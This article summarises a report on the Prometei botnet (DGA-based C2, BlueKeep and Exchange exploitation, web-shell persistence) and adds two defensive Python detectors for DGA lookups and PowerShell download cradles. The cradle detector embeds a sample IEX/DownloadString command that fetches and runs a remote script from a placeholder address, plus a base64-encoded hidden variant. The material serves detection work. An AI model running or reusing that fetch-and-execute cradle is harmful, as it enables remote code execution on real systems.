A recent investigation has provided critical insights into the evolution and activity of the Prometei botnet, a malware network that has posed a significant threat to organizational networks since at least 2016. Prometei operates as a modular botnet, allowing attackers to maintain remote control over compromised machines, deploy additional malware, and orchestrate large-scale cyber attacks. In particular, this botnet has been utilized to conduct cryptocurrency mining, primarily targeting Monero, while also gathering valuable credentials to facilitate further compromises.
Evolution of the Prometei Botnet
Active since at least 2016, Prometei has gone through several iterations, the most recent being version 3, released in late 2022. Each version has expanded Prometei's capabilities and made it harder to detect and defend against. Version 3 adds a Domain Generation Algorithm (DGA) to its Command-and-Control (C2) infrastructure: infected hosts compute a rolling set of candidate domain names and try them until one resolves, so the operators can bring up new C2 servers under freshly registered names while defenders are still blocking the old ones. This C2 mechanism is central to Prometei's resilience, as it keeps infected systems connected to the operators even after some C2 servers are detected, blocked or seized.
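Because the page does not reproduce Prometei's actual DGA, the useful thing to show on the defender's side is how DGA-driven C2 lookups stand out in resolver logs: a single host issuing many distinct, high-entropy, vowel-poor domain queries that mostly fail to resolve. The following is an added example, not code from the report or from the malware; the log format, the thresholds and the sample log lines are all constructed for illustration.

```python
"""Heuristic detection of DGA-style C2 lookups in DNS resolver logs.

Added example: a generic DGA-lookup heuristic, not Prometei's own domain
generation algorithm (which the report summarised above does not reproduce).
"""
import math
from collections import defaultdict

# Constructed sample resolver log (not real telemetry), one query per line:
#   <timestamp> <client_ip> <query_name> <response_code>
SAMPLE_DNS_LOG = """\
2023-02-01T10:00:01Z 10.1.4.22 www.microsoft.com NOERROR
2023-02-01T10:00:02Z 10.1.4.22 xk3q9zt7vbp2.com NXDOMAIN
2023-02-01T10:00:02Z 10.1.4.22 q8wzr2mvl4nc.net NXDOMAIN
2023-02-01T10:00:03Z 10.1.4.22 hg5tn7xpk9dr.com NXDOMAIN
2023-02-01T10:00:03Z 10.1.4.23 stackoverflow.com NOERROR
2023-02-01T10:00:04Z 10.1.4.22 zb4mq1ws6ltk.org NXDOMAIN
2023-02-01T10:00:04Z 10.1.4.23 micosoft.com NXDOMAIN
2023-02-01T10:00:05Z 10.1.4.22 rp9vcx2hn8gz.com NXDOMAIN
2023-02-01T10:00:05Z 10.1.4.23 mnbvcx1q2wer.com NXDOMAIN
2023-02-01T10:00:06Z 10.1.4.22 update.windows.com NOERROR
"""

VOWELS = set("aeiou")


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for empty input)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def registrable_label(qname: str) -> str:
    """Return the label left of the TLD ('www.example.com' -> 'example').

    Simplification: the last label is treated as the TLD, so multi-part
    public suffixes such as 'co.uk' are not handled; a real deployment
    would consult the Public Suffix List.
    """
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_dga_like(qname: str, min_len: int = 10, min_entropy: float = 3.2,
                max_vowel_ratio: float = 0.25) -> bool:
    """Flag labels that look machine-generated: long, high-entropy, few vowels.

    Thresholds are illustrative assumptions; tune them against your own
    baseline of legitimate query names before relying on them.
    """
    label = registrable_label(qname)
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    return shannon_entropy(label) >= min_entropy and vowel_ratio <= max_vowel_ratio


def find_dga_hosts(log_text: str, min_hits: int = 3) -> dict:
    """Return {client_ip: sorted DGA-like NXDOMAIN names} for clients with >= min_hits.

    Requiring several *distinct* failed lookups per client is what separates
    a bot cycling through generated names from a user's single typo.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines rather than abort the scan
        _ts, client, qname, rcode = fields
        if rcode == "NXDOMAIN" and is_dga_like(qname):
            hits[client].add(qname.lower())
    return {client: sorted(names) for client, names in hits.items()
            if len(names) >= min_hits}


if __name__ == "__main__":
    for client, names in find_dga_hosts(SAMPLE_DNS_LOG).items():
        print(f"{client}: {len(names)} DGA-like NXDOMAIN lookups, e.g. {names[0]}")
```

In the constructed log only 10.1.4.22 crosses the per-host threshold; 10.1.4.23's one random-looking name and one typo stay below it, which is the point of counting distinct failures per client rather than scoring domains in isolation. A low NXDOMAIN ratio from such a host would also be worth a look, since a DGA whose current domain has been registered resolves successfully.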
By early 2023, Prometei had compromised over 10,000 systems worldwide, with notable clusters of activity in Brazil, Indonesia, and Turkey. This broad geographic reach, combined with Prometei's modular structure, lets the operators adapt quickly and spread across very different environments.
Attack Vectors and Exploited Vulnerabilities
Prometei’s spread is largely driven by exploiting well-known vulnerabilities, which highlights the critical importance of regular patching and proactive vulnerability management. Key vulnerabilities targeted by Prometei include:
- BlueKeep (CVE-2019-0708): a critical, pre-authentication vulnerability in Remote Desktop Services on older Windows versions, allowing an unauthenticated attacker who can reach the RDP port to execute code remotely.
- Microsoft Exchange Server vulnerabilities (CVE-2021-27065 and CVE-2021-26858): used by Prometei to gain a foothold in enterprise environments; chained against an Internet-facing Exchange Server, they allow the attackers to execute arbitrary code on it.
In addition to these exploits, Prometei uses PowerShell to download and execute its payloads once it has a foothold, which aids both its spread and its persistence within targeted environments.
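PowerShell download-and-execute cradles leave a clear trace in script block logging (Event ID 4104) if the defender looks for the combination of fetching remote content and executing or hiding it, and decodes any -EncodedCommand argument before matching. The following is an added example and is not Prometei's loader or any code from the report; the indicator list, the pipe-separated log format and the sample script blocks (including the 203.0.113.10 documentation-range address) are constructed.

```python
"""Flag PowerShell download-and-execute cradles in script block logs.

Added example, not Prometei's own loader: the indicators are generic
download-cradle and evasion patterns, and the log lines are constructed.
"""
import base64
import re

# -EncodedCommand (-e / -ec / -enc) takes base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicator groups; a block is suspicious when it fetches remote content AND
# either executes it or tries to hide itself.
INDICATORS = {
    "download": [
        r"net\.webclient", r"downloadstring", r"downloadfile",
        r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod", r"\birm\b",
        r"start-bitstransfer",
    ],
    "execute": [
        r"invoke-expression", r"\biex\b", r"start-process", r"frombase64string",
    ],
    "evasion": [
        r"-nop\b", r"-noprofile", r"-w(?:indowstyle)?\s+hidden",
        r"-e(?:xecutionpolicy|p)\s+bypass", ENCODED_RE.pattern,
    ],
}

# Constructed samples: a plain cradle and the same cradle wrapped in -enc.
CRADLE_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED_SAMPLE = base64.b64encode(CRADLE_SAMPLE.encode("utf-16-le")).decode("ascii")

# Constructed log, one script block per line: timestamp|host|user|script block
SAMPLE_SCRIPTBLOCK_LOG = f"""\
2023-02-01T10:00:01Z|WS-0412|corp\\alice|Get-ChildItem C:\\Users -Recurse | Measure-Object
2023-02-01T10:00:05Z|WS-0412|corp\\alice|Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\\temp\\report.csv
2023-02-01T10:01:12Z|SRV-EXCH01|nt authority\\system|{CRADLE_SAMPLE}
2023-02-01T10:01:40Z|SRV-EXCH01|nt authority\\system|powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}
"""


def decode_encoded_command(text: str):
    """Decode an -EncodedCommand argument found in `text`, or return None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / UTF-16LE, so not an encoded command


def scan_script_block(block: str) -> dict:
    """Match indicator groups against the block and any decoded payload in it."""
    decoded = decode_encoded_command(block)
    haystack = block if decoded is None else block + "\n" + decoded
    groups = sorted(
        name for name, patterns in INDICATORS.items()
        if any(re.search(p, haystack, re.IGNORECASE) for p in patterns)
    )
    suspicious = "download" in groups and ("execute" in groups or "evasion" in groups)
    return {"suspicious": suspicious, "groups": groups, "decoded": decoded}


def scan_log(log_text: str) -> list:
    """Parse 'timestamp|host|user|script block' lines into one finding each."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, block = line.split("|", 3)  # the block itself may contain '|'
        findings.append({"time": ts, "host": host, "user": user, **scan_script_block(block)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_SCRIPTBLOCK_LOG):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['time']} {f['host']} {f['user']}: {flag} {f['groups']}")
```

The second sample, an Invoke-WebRequest that only downloads a file, is deliberately left unflagged: requiring a download indicator together with an execution or evasion indicator keeps ordinary administrative scripting out of the alert queue, while the fourth sample is caught only because the encoded payload is decoded and rescanned.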
Tactics for Persistence and Evasion
Prometei employs a variety of tactics to maintain long-term persistence and evade detection:
- Use of an Apache web server with a PHP web shell: a bundled Apache server deployed on the compromised host, combined with a PHP-based web shell, gives the attackers a second way in that survives the loss of their other access, and a web server listening on a host blends in better with normal traffic than a bespoke backdoor.
- Self-updating mechanisms: the botnet can fetch updated components from its own infrastructure without the operators touching each host, which lets it roll out new functionality and evasion changes quickly in response to new defences.
- Compressed Archive Components: Prometei’s modular nature is supported by downloading compressed archives that contain multiple botnet components. These archives allow attackers to add, replace, or remove specific features as needed, streamlining their operations and making the botnet more agile against detection.
The Prometei botnet shows how attackers combine well-known vulnerabilities with a modular malware architecture to build an adaptable and resilient botnet. As Prometei continues to evolve and add techniques, organizations should patch the vulnerabilities it is known to exploit, monitor for its C2 and persistence behaviour, and strengthen endpoint detection to reduce the risk.
For an in-depth review of Prometei’s tactics, techniques, and procedures, view the full report here.